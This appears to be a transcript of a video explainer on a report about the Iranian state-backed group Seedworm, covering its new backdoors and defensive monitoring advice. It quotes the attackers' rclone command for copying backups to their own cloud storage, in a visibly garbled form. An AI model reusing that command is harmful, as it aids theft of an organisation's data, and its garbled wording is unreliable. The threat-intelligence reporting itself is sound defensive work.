Welcome to The Explainer. Today we're diving into a brand new intelligence report that connects the dots between a real-world military conflict and a really sophisticated wave of cyber attacks, all coming from a state-sponsored threat group.
All right, so everything we're going to talk about today is based on a report from security.com. It's called Seedworm, Iranian APT on networks of U.S. bank, airport, software company.
So what's the big headline here? Well, the report found that an Iranian group called Seedworm has been seen inside the networks of some really high-value targets in the US and Israel. Now, this group is what we call an Advanced Persistent Threat, or an APT. And that basically means it's not just some smash-and-grab hacker. This is a sophisticated, long-term campaign, almost certainly backed by a government. And get this, the activity apparently kicked off back in February 2026 and is still going on.
Okay, so who is this group Seedworm? And, why should we care? What does this discovery actually mean for global security?
Well, Seedworm isn't exactly new to the scene. You might have heard of them by other names like Muddy Water or Static Kitten. They're a pretty well-known group, and their main game is cyber espionage. They're widely believed to be working for or as part of Iran's Ministry of Intelligence and Security, the MOIS.
Now, what's really crucial to understand is that this isn't just random hacking. No way. This cyber activity is happening for a reason, and it's directly tied to some major geopolitical events that really set the stage for this digital offensive.
Things really heated up in late February and early March of 2026. It all started with a coordinated military operation, which then led to Iran launching retaliatory strikes. So you have this physical conflict, what experts call a kinetic conflict, and that created the perfect storm for a parallel war to break out in cyberspace.
And this lines up perfectly with what intelligence agencies were already saying. I mean, even before these specific hacks were discovered, organizations like the UK's National Cybersecurity Centre were putting out alerts. They were basically warning everyone that a digital response from Iran wasn't just possible, it was pretty much guaranteed.
Okay, so let's get into the nitty-gritty. What are the actual tools and tactics that Seedworm and its allies are using on the front lines of this digital war?
All right, this is interesting. Investigators found two brand new backdoors. The first one is called Dindoor, and it's built using the Dino runtime. That's a pretty modern environment for JavaScript. The second one is called Fakeset, which is a Python-based tool. But here's the really clever part. Both of these tools were signed with digital certificates, one for an Amy Shern and another for a Donald Gay. It's a classic trick to make the malware look legitimate and hopefully slide right past security software.
It wasn't just about getting in, they were also trying to steal data. To do this, they used a legitimate tool, something lots of IT pros use called rclone. And they ran this exact command here. rclone copy $IDL drive fixed backups wasabi removed /192.16.8.0.x. The whole point of this was to copy a bunch of backup files straight out of the network and into a cloud storage bucket that they controlled.
Okay, pay attention to these. These are what we call active indicators of compromise, or IOCs. Think of them as digital breadcrumbs left by the attackers. They're all linked to the malware's command and control servers. So for anyone in a security role watching this, these are the domains and subdomains you need to be blocking and hunting for in your logs. Like right now.
So all of this brings us to probably the most important question, right? Especially for any organization out there watching this unfold. What can you actually do about it? How do you protect your networks from this stuff?
Well, the report lays out a pretty solid defensive strategy, and it's all about multiple layers. There's no single magic bullet here. It's about building up resilience against all kinds of different attacks. And a good place to start is with the most obvious targets, your public-facing services. So for things like distributed denial of service, DDoS for short, and website defacements, you've got to be proactive. You can't just wait for it to happen. That means keeping an eye out for weird spikes in traffic, using a web application firewall, or WAF, and turning on DDoS protection. And honestly, one of the best things you can do is just reduce your attack surface. If you don't need a service to be online, take it offline.
Next up, credential attacks. Trying to steal passwords. To catch these, you need to look for the classic signs. Tons of failed login attempts, people trying to log in from weird geographical locations, and this one is huge right now, MFA fatigue attacks. That's where the attacker just spams your phone with push notifications over and over, hoping you'll get annoyed and just hit approve by accident.
And this is maybe the most important one. We have to talk about destructive attacks like wipers.
Think of the infamous Shamoon malware that went after the Saudi oil industry. The things listed here, these are the warning signs. If you see mass creation of scheduled tasks, or attempts to shut down your security software, or the deletion of backups, that is a massive red flag. You have to monitor for this stuff because it's your best chance to catch a destructive attack before it's game over.
Okay, so let's pull back from all the technical details for a second. What's the big picture? What does all this activity really tell us about where cyber conflict is headed?
I think the key takeaway is that the lines are getting incredibly blurry. It used to be you'd have your espionage over here, your hacktivism over there, and your destructive attacks in another box. Not anymore. Now, all of these things are getting mashed together into these big, noisy campaigns designed for two things: to achieve a strategic goal and to send a very loud political message.
You know, the report brings up a really powerful point by mentioning Stuxnet. And it's a chilling reminder, right? For every single one of these operations that we actually find, you have to assume there are others happening completely in the dark. The most impactful cyber operations, they're usually the ones we know nothing about. Yet.
And that kind of leaves us with one final and pretty provocative question. As the physical battlefield and the digital one keep blending together, to the point where they're almost the same thing, what does the next escalation even look like?
If you found this helpful, please like and subscribe. It really helps us continue making these explainers.